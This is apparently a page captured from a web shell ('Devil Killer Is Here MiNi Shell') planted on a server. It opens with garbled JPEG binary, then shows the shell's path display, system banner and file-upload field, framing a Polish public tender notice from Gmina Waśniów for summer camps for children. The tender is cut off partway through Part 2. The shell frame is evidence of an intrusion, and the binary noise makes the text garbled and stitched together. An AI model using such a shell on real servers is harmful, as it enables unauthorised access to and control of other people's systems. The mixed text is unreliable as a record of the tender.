JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250608/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250608/0026738501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa organizacji wyjazdu na kolonie letnie dla dzieci ze świetlic środowiskowych w gminie Waśniów </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA WAŚNIÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 291010837</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Rynek 24</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Waśniów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">27-425</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(41) 2646026</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">(41) 2646028</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">techniczny@wasniow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wasniow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa organizacji wyjazdu na kolonie letnie dla dzieci ze świetlic środowiskowych w gminie Waśniów </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5a72f0b3-aae7-4cf7-9681-6920fb8f1a39</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00267385</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00024854/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 USŁUGA ORGANIZACJI WYJAZDU NA KOLONIE LETNIE DLA DZIECI ZE ŚWIETLIC ŚRODOWISKOWYCH W GMINIE WAŚNIÓW</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt: Świetlice środowiskowe wsparciem dla rodzin w gminie Waśniów Program: Fundusze Europejskie dla Świętokrzyskiego 2021 – 2027 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://wasniow.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://wasniow.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Dopuszczalne formy komunikacji:<br/> a. platforma zakupowa Zamawiającego: https://wasniow.ezamawiajacy.pl (zakładka „Korespondencja”),<br/> b. poczta elektroniczna Zamawiającego: techniczny@wasniow.pl (wyłącznie w przypadku awarii platformy zakupowej).<br/> 2. Minimalne wymagania sprzętowo-aplikacyjne dla platformy zakupowej:<br/> a. posiadanie stałego dostępu do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/> b. dysponowanie komputerem klasy PC lub MAC o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z<br/> systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje,<br/> c. dysponowanie dowolną zainstalowaną przeglądarką internetową obsługującą TLS 1.2 (najlepiej w najnowszej wersji, w przypadku<br/> Internet Explorer minimalnie wersja 10.0,<br/> d. dysponowanie zainstalowanym programem Acrobat Reader lub innym obsługującym pliki w formacie „.pdf”.<br/> 3. Minimalne wymagania sprzętowo-aplikacyjne dla poczty elektronicznej:<br/> a. dysponowanie przez Wykonawcę urządzeniem teleinformatycznym z dostępem do sieci Internet,<br/> b. dysponowanie przez Wykonawcę dostępem do nowoczesnej przeglądarki internetowej wspierającej HTML5, CSS3 i JavaScript,<br/> c. posiadanie przez Wykonawcę konta poczty elektronicznej.<br/> 4. Komunikacja przy użyciu platformy zakupowej (w tym możliwość złożenia oferty), z zastrzeżeniem możliwości zadawania pytań<br/> do treści SWZ, wymaga przystąpienia przez Wykonawcę do postępowania. Szczegółowa procedura przystąpienia do postępowania,<br/> w tym procedura rejestracji konta Wykonawcy na platformie została określona w Dziale II Rozdziale 2 ust. 6 SWZ.<br/> 5. Data przekazania korespondencji:<br/> a. platforma zakupowa – data jej wpływu na platformę zakupową (data, czas: hh:mm:ss) wg czasu lokalnego serwera<br/> synchronizowanego odpowiednim źródłem czasu,<br/> b. poczta elektroniczna – data jej wprowadzenia do środka komunikacji elektronicznej w taki sposób, żeby można było zapoznać się<br/> z jej treścią.<br/> 6. Maksymalny rozmiar plików przesyłanych jednorazowo:<br/> a. platforma zakupowa – nie więcej niż 100 MB,<br/> b. poczta elektroniczna – nie więcej niż 20 MB.<br/> 7. Możliwość zadania pytania do treści SWZ z pominięciem procedury przystąpienia do postępowania - skorzystanie z opcji &#34;Zadaj<br/> pytanie&#34; dostępnej na platformie zakupowej.<br/> 8. Wymagane lub dopuszczone postaci lub formy przekazywanych dokumentów zostały określone w Dziale II Rozdziale 2 ust. 10 -14<br/> SWZ.<br/> 9. Złożenie oferty wymaga posiadania przez Wykonawcę kwalifikowalnego podpisu elektronicznego, podpisu zaufanego lub podpisu<br/> osobistego.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 roku w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (dalej: RODO), Zamawiający informuje, iż administratorem danych osobowych jest Wójt Gminy Waśniów, ul. Rynek 24, 27-425 Waśniów, tel. .412646026, e-mail: sekretariat@gminawasniow.pl. <br/>2.	Dane inspektora ochrony danych osobowych: Tomasz Paprocki, e-mail: sekretariat@gminawasniow.pl. <br/>3.	Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z prowadzeniem postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięciem, jak również udokumentowania postępowania o udzielenie zamówienia i jego archiwizacji, w tym na potrzeby ewentualnych postępowań kontrolnych realizowanych przez właściwe organy i instytucje, w tym w związku z uzyskanym ewentualnie przez Zamawiającego dofinansowaniem z Europejskiego Funduszu Społecznego Plus (EFS+) w ramach programu regionalnego Fundusze Europejskie dla Świętokrzyskiego 2021 – 2027 (dofinansowanie). <br/>4.	Odbiorcami danych osobowych są podmioty, którym dokumentacja postępowania zostanie udostępniona w oparciu o przepisy Pzp. <br/>5.	Zamawiający informuje, że w związku z uzyskanym przez Zamawiającego dofinansowaniem i wynikającym z umowy o dofinansowanie zobowiązaniem do przechowywania dokumentacji związanej z realizacją projektu pn. „Świetlice środowiskowego wsparciem dla rodzin w gminie Waśniów” przez okres 5 lat, liczonych od dnia 31 grudnia, w którym Województwo Świętokrzyskie jako Instytucja Zarządzająca dokonała ostatniej płatności na rzecz Zamawiającego, dane osobowe pozyskane w związku z prowadzeniem postępowania o udzielenie zamówienia publicznego będą przechowywane do dnia 31 grudnia 2031 roku. <br/>6.	Niezależnie od postanowień ust. 5 powyżej, w przypadku zawarcia umowy w sprawie zamówienia publicznego, dane osobowe będą przetwarzane do upływu okresu przedawnienia roszczeń wynikających z umowy w sprawie zamówienia publicznego. <br/>7.	Osoba, której dotyczą pozyskane w związku z prowadzeniem niniejszego postępowania dane osobowe, ma prawo: <br/>a.	dostępu do swoich danych osobowych – zgodnie z art. 15 RODO, przy czym w sytuacji, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1 – 3 RODO wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy, daty lub numeru referencyjnego bieżącego bądź zakończonego postępowania o udzielenie zamówienia publicznego, <br/>b.	do sprostowana swoich danych osobowych – zgodnie z art. 16 RODO, przy czym skorzystanie z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego, ani zmianą postanowień umowy w zakresie niezgodnym z Pzp oraz nie może naruszać integralności protokołu oraz jego załączników, <br/>c.	do żądania od Zamawiającego, jako administratora, ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego. Prawo to nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego, <br/>d. wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych w przypadku uznania, że przetwarzanie jej danych osobowych narusza przepisy o ochronie danych osobowych, w tym przepisy RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1.	Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. Konsekwencje niepodania określonych danych określa PZP. <br/>2.	Osobie, której dane osobowe zostały pozyskane przez Zamawiającego w związku z prowadzeniem postępowania o udzielenie zamówienia publicznego nie przysługuje:<br/>a.	prawo do usunięcia danych osobowych, <br/>b.	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO, <br/>c.	określone w art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych, a to z uwagi na fakt, że podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>3.	Dane osobowe mogą być przekazywane do organów publicznych i urzędów państwowych lub innych podmiotów upoważnionych na podstawie przepisów prawa lub wykonujących zadania realizowane w interesie publicznym lub w ramach sprawowania władzy publicznej, w szczególności do podmiotów prowadzących działalność kontrolną wobec Zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">T.2710.55.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia w Części 1 jest usługa organizacji wyjazdu na kolonie letnie dla dzieci ze świetlic środowiskowych w gminie Waśniów, obejmująca realizację dwóch Zadań: <br/>A. Zadanie 1 – Organizacja kolonii letniej dla dzieci ze świetlicy środowiskowej w Waśniowie w 2025 roku, w ramach której Wykonawca jest zobowiązany w szczególności do:<br/>a. zapewnienia transportu drogowego (autokar wraz z kierowcą) w celu przewiezienia 33 osób – 30 dzieci w wieku szkolnym (od 6 do 15 lat) oraz 3 wychowawców (dalej łącznie: uczestnicy kolonii) z parkingu zlokalizowanego przy Szkole Podstawowej w Waśniowie lub z innego miejsca wskazanego przez Zamawiającego na terenie gminy Waśniów do miejsca wypoczynku (zakwaterowania) i z powrotem, z zastrzeżeniem że zapewnienie wychowawców jest obowiązkiem Wykonawcy,<br/>b. zapewnienia uczestnikom kolonii zakwaterowania, z zastrzeżeniem że miejscem wypoczynku (zakwaterowania) może być jedna z następujących miejscowości: <br/>- Zakopane, <br/>- Biały Dunajec, <br/>- Kościelisko, <br/>- Nowy Targ, <br/>- Bukowina Tatrzańska, <br/>- Inna, w odległości do 10 km od miejscowości wskazanych powyżej, <br/>c. zapewnienia uczestnikom kolonii wyżywienia, w tym napojów w postaci 4 posiłków dziennie (śniadanie, obiad, podwieczorek, kolacja), <br/>d. zapewnienie uczestnikom kolonii (dzieciom w wieku szkolnym od 6 do 15 lat) programu zajęć na czas pogody i niepogody, w zakresie obejmującym co najmniej: <br/>- 2 wycieczki autokarowe całodniowe wraz z usługą przewodnika, <br/>- 3 wycieczki krajoznawcze, <br/>- zajęcia profilaktyczne, gry terenowe, zajęcia plastyczne, gry i zabawy rekreacyjno-sportowe, <br/>- ogniska, dyskoteki, <br/>e. zapewnienia uczestnikom kolonii opieki medycznej i opieki ratownika, <br/>f. ubezpieczenia uczestników kolonii od następstw nieszczęśliwych wypadków, <br/>B. Zadanie 2 – Organizacja kolonii letniej dla dzieci ze świetlicy środowiskowej w Mominie w 2025 roku, w ramach której Wykonawca jest zobowiązany w szczególności do: <br/>a. zapewnienia transportu drogowego (autokar wraz z kierowcą) w celu przewiezienia 33 osób – 30 dzieci w wieku szkolnym (od 6 do 15 lat) oraz 3 wychowawców (dalej łącznie: uczestnicy kolonii) z parkingu zlokalizowanego przy Szkole Podstawowej w Mominie lub z innego miejsca wskazanego przez Zamawiającego na terenie gminy Waśniów do miejsca wypoczynku (zakwaterowania) i z powrotem, z zastrzeżeniem że zapewnienie wychowawców jest obowiązkiem Wykonawcy,<br/>b. zapewnienia uczestnikom kolonii zakwaterowania, z zastrzeżeniem że miejscem wypoczynku (zakwaterowania) może być jedna z następujących miejscowości: <br/>- Zakopane, <br/>- Biały Dunajec, <br/>- Kościelisko, <br/>- Nowy Targ, <br/>- Bukowina Tatrzańska, <br/>- Inna, w odległości do 10 km od miejscowości wskazanych powyżej, <br/>c. zapewnienia uczestnikom kolonii wyżywienia, w tym napojów w postaci 4 posiłków dziennie (śniadanie, obiad, podwieczorek, kolacja), <br/>d. zapewnienie uczestnikom kolonii (dzieciom w wieku szkolnym od 6 do 15 lat) programu zajęć na czas pogody i niepogody, w zakresie obejmującym co najmniej: <br/>- 2 wycieczki autokarowe całodniowe wraz z usługą przewodnika, <br/>- 3 wycieczki krajoznawcze, <br/>- zajęcia profilaktyczne, gry terenowe, zajęcia plastyczne, gry i zabawy rekreacyjno-sportowe, <br/>- ogniska, dyskoteki, <br/>e. zapewnienia uczestnikom kolonii opieki medycznej i opieki ratownika, <br/>f. ubezpieczenia uczestników kolonii od następstw nieszczęśliwych wypadków.<br/> 2. Szczegółowy opis przedmiotu zamówienia, w szczególności wymogi dot. transportu, zakwaterowania, wyżywienia,<br/> zapewnienia opieki, w tym kwalifikacje Koordynatora kolonii i wychowawców, zapewnienia ubezpieczenia, minimalnego<br/> programu zajęć został określony w Załączniku nr 1 do SWZ – „Opis przedmiotu zamówienia” (indywidualnie dla każdego<br/> Zadania).<br/> 3. Przedmiot zamówienia jest współfinansowany ze środków Unii Europejskiej, pochodzących z Europejskiego Funduszu<br/> Społecznego Plus (EFS+) w ramach programu regionalnego Fundusze Europejskie dla Świętokrzyskiego 2021 – 2027. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55240000-4 - Usługi w zakresie ośrodków i domów wypoczynkowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55241000-1 - Usługi w zakresie ośrodków wypoczynkowych</p> <p class="mb-0">55243000-5 - Usługi w zakresie obozowisk dla dzieci</p> <p class="mb-0">55100000-1 - Usługi hotelarskie</p> <p class="mb-0">55320000-9 - Usługi podawania posiłków</p> <p class="mb-0">92000000-1 - Usługi rekreacyjne, kulturalne i sportowe</p> <p class="mb-0">80000000-4 - Usługi edukacyjne i szkoleniowe</p> <p class="mb-0">63000000-9 - Usługi dodatkowe i pomocnicze w zakresie transportu, usługi biur podróży</p> <p class="mb-0">63510000-7 - Usługi biur podróży i podobne</p> <p class="mb-0">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe Koordynatora kolonii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekt społeczny</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia w Części 2 jest usługa organizacji wyjazdu na kolonie letnie dla dzieci ze świetlic środowiskowych w gminie Waśniów, obejmująca realizację dwóch Zadań: <br/>A. Zadanie 1 – Organizacja kolonii letniej dla dzieci ze świetlicy środowiskowej w Waśniowie w 2026 roku, w ramach której Wykonawca jest zobowiązany w szczególności do:<br/>a. zapewnienia transportu drogowego (autokar wraz z kierowcą) w celu przewiezienia 33 osób – 30 dzieci w wieku szkolnym (od 6 do 15 lat) oraz 3 wychowawców (dalej łącznie: uczestnicy kolonii) z parkingu zlokalizowanego przy Szkole Podstawowej w Waśniowie lub z innego miejsca wskazanego przez Zamawiającego na terenie gminy Waśniów do miejsca wypoczynku (zakwaterowania) i z powrotem, z zastrzeżeniem że zapewnienie wychowawców jest obowiązkiem Wykonawcy,<br/>b. zapewnienia uczestnikom kolonii zakwaterowania, z zastrzeżeniem że miejscem wypoczynku (zakwaterowania) może być jedna z następujących miejscowości: <br/>- Zakopane, <br/>- Biały Dunajec, <br/>- Kościelisko, <br/>- Nowy Targ, <br/>- Bukowina Tatrzańska, <br/>- Inna, w odległości do 10 km od miejscowości wskazanych powyżej, <br/>c. zapewnienia uczestnikom kolonii wyżywienia, w tym napojów w postaci 4 posiłków dziennie (śniadanie, obiad, podwieczorek, kolacja), <br/>d. zapewnienie uczestnikom kolonii (dzieciom w wieku szkolnym od 6 do 15 lat) programu zajęć na czas pogody i niepogody, w zakresie obejmującym co najmniej: <br/>- 2 wycieczki autokarowe całodniowe wraz z 